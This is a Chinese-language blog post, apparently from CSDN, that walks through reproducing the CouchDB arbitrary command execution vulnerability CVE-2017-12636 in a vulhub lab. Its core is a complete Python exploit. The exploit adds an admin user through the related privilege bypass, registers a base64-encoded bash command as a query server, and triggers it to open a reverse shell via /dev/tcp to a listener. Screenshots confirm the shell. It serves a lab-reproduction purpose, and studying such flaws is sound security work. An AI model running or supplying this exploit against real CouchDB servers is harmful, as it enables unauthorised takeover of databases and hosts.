【vulhub】Couchdb 任意命令执行漏洞(CVE-2017-12636)

最新推荐文章于 2023-11-25 23:13:03 发布
最新推荐文章于 2023-11-25 23:13:03 发布
阅读量577 收藏
点赞数
分类专栏: vulhub 文章标签: conchdb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/120289729
版权

特征

特征请参考我的上一篇帖子
【vulhub】Couchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞复现

影响版本:小于 1.7.0 以及 小于 2.1.1

复现

注:复现中的很多东西也要用到这篇帖子,所以先看这篇

【vulhub】Couchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞复现

再来看本篇帖子

该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户
本次复现是用的版本1.6
http://192.168.100.34:5984访问该地址,可以看到couchdb的一些相关版本信息
在这里插入图片描述
http://192.168.100.34:5984/_utils/访问该地址,就直接进去了,说明存在未授权!

注:这里如果未配置服务器管理员之前,所有客户端都具有管理员权限

详情请参考:https://blog.csdn.net/Aaron_Miller/article/details/97114298
在这里插入图片描述
前面说了需要登录才能利用,
那么就用CVE-2017-12635增加一个账号密码把(是管理员权限哦)
在这里插入图片描述
在这里插入图片描述
本来是想写下poc的,但是官方给的poc太辣鸡了,我都无语了。。。1版本和2版本的poc都有,这里就只展示了1版本的poc效果。
在这里插入图片描述
在这里插入图片描述
不过官方给了python写的exp,可以直接反弹shell!
修改其中的target和command为你的测试机器,然后修改version为对应的Couchdb版本(1或2),成功反弹shell:
我的上一篇帖子说了,用户只能创建一次,不过这个exp最后,连接用户并执行命令,所以遇到已有用户也不要紧,修改其中的target和command为你的测试机器,然后修改version为对应的Couchdb版本(1或2)就行了

#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth

target = 'http://192.168.100.34:5984'
command = rb"""sh -i >& /dev/tcp/192.168.100.34/2333 0>&1"""
version = 1

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))

session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

先监听
在这里插入图片描述
然后执行该exp
在这里插入图片描述

成功反弹shell
在这里插入图片描述

参考

https://blog.csdn.net/Aaron_Miller/article/details/97367894
https://www.cnblogs.com/huangxiaosan/p/14317324.html
https://www.cnblogs.com/huasheng333/p/13264868.html

樱浅沐冰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CouchDBClient:CouchDB客户端-.NET客户端框架,用于使用CouchDB
02-03
CouchDBClient(CouchDB .NET客户端) CouchDBClient是用于从.NET代码使用CouchDB的框架。 它抽象化并简化了CouchDB的用法,因此您可以轻松地从应用程序代码中使用它。 在框架下掩盖了使用纯json和http请求/响应的所有复杂性。 使用此框架,您将能够创建,检索,保存和删除作为纯对象的文档。 安装CouchDBClient Nuget Install-Package CouchDBClient - Version 1.0 . 0 CouchDBClient背后的故事 我试图使CouchDBClient更加友好以使用自定义对象-这就是应用程序通常存储在数据库中的内容。 早在我开始编写此框架时,我发现并尝试过的所有其他方法都给人留下了非标准化方法签名(使用各种约定进行命名并且更难猜测其作用)的印象,而不是统一的接口(有关字符串文档的某些操作,而其他一些围绕json docs的文档),不是非常灵活(某些仅用于字符串,其他仅用于对象),或者不是非常抽象(必须先了解CouchDB REST API才能正确使用它们)。 我假设并希望它们从那时起
CouchDB任意命令执行CVE-2017-12636
Kevin's Blog
07-26 941
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问,CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
Couchdb 任意命令执行漏洞CVE-2017-12636
weixin_44311721的博客
07-30 1398
Couchdb 任意命令执行漏洞CVE-2017-12636Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的...
Couchdb 任意命令执行漏洞CVE-2017-12636)复现
HEAVEN569的博客
06-21 988
Couchdb 任意命令执行漏洞CVE-2017-12636)复现
Couchdb 命令执行漏洞复现 (CVE-2017-12636
最新发布
XXokok的博客
11-25 253
Couchdb 命令执行漏洞复现 (CVE-2017-12636
Apache couchdb 命令执行CVE-2017-12636)复现
YouthBelief的博客
11-04 759
couchdb 命令执行CVE-2017-12636couchdb 命令执行CVE-2017-12636)0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具复现0x04 漏洞修复 couchdb 命令执行CVE-2017-12636) Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展
Vulhub漏洞系列:Couchdb漏洞CVE-2017-12635、CVE-2017-12636
weixin_43072923的博客
05-24 1423
Vulhub漏洞系列:Couchdb漏洞CVE-2017-12635、CVE-2017-12636)00.前言01.Couchdb简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.Couchdb简介 CouchDB是一个利用JSON文件来存贮数据,javascript作为MapReduce查询,以及常规HTTP作为API的且面向文档的开源数据库管理系统。 02.漏洞描述 0x01:CVE-2017
Couchdb数据库-命令执行漏洞复现-CVE-2017-12636
apple_52661176的博客
08-31 180
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。0>&1""" #攻击机ip。开启vulfocus靶场环境。在攻击机上开启nc监听。
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
couchdb-github-action:在Github Action上运行CouchDB
02-05
couchdb-github-action:在Github Action上运行CouchDB
Chill — CouchDB REST API的Rust客户端-Rust开发
05-27
Chill Chill是用于Rust编程语言的客户端CouchDB库,可在crates.io上获得。 它的目标是防锈马able。 Chill的三位负责人de Chill Chill是用于Rust编程语言的客户端CouchDB库,可在crates.io上获得。 它的目标是防锈马...
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 360
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636
利他者利己,利己者无功。利他利己,利己利他。
10-22 677
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
Couchdb_任意命令执行漏洞 CVE-2017-12636 漏洞复现
ADummy的博客
02-22 303
Couchdb 垂直权限绕过漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。CouchDB会默认会在5984端口开放Restful的API接口,用于数据库的管理功能。 那么,问题出在哪呢?翻阅官方描述会发现,CouchDB中有一个Query_Server的配置
CouchDB漏洞复现
weixin_44259979的博客
10-07 772
CouchDB漏洞复现
CVE-2017-12635(Couchdb垂直权限绕过漏洞
浅笑996的博客
11-28 1719
简介 Apache CouchDB是一个开源数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年年11月15日...
vulhubCouchdb 垂直权限绕过漏洞CVE-2017-12635)漏洞复现
qq_45300786的博客
09-14 861
特征 1、端口可能是5984,直接访问端口是couchdb 2、访问/_utils目录,网站title是一个红色沙发,title名是Project Fauxton还可以看到couchdb图标 那么我们根据这些特征,用fofa搜索一下 title="Project Fauxton" 利用条件 影响版本:小于 1.7.0 以及 小于 2.1.1 参考: 复现中的一些原理和排错 https://www.cnblogs.com/foe0/p/11375757.html 搭建过程 https://blog.
vulhub】s2-007远程代码执行漏洞
热门推荐
qq_45300786的博客
07-08 1万+
poc %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.l
6f940c91ee6c hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:5984->5984/tcp couchdb0 b38fcba5811f hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:8984->5984/tcp couchdb3 f35978830422 hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:6984->5984/tcp couchdb1
05-24
这是一个运行了三个 CouchDB 容器的 Docker 服务。这些容器的镜像来自于 Hyperledger Fabric 项目,用于支持区块链网络的数据存储和查询。每个容器都暴露了不同的端口,其中 5984 是 CouchDB 的默认端口,8984 和 6984 是自定义的端口。容器分别命名为 couchdb0、couchdb1 和 couchdb3。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值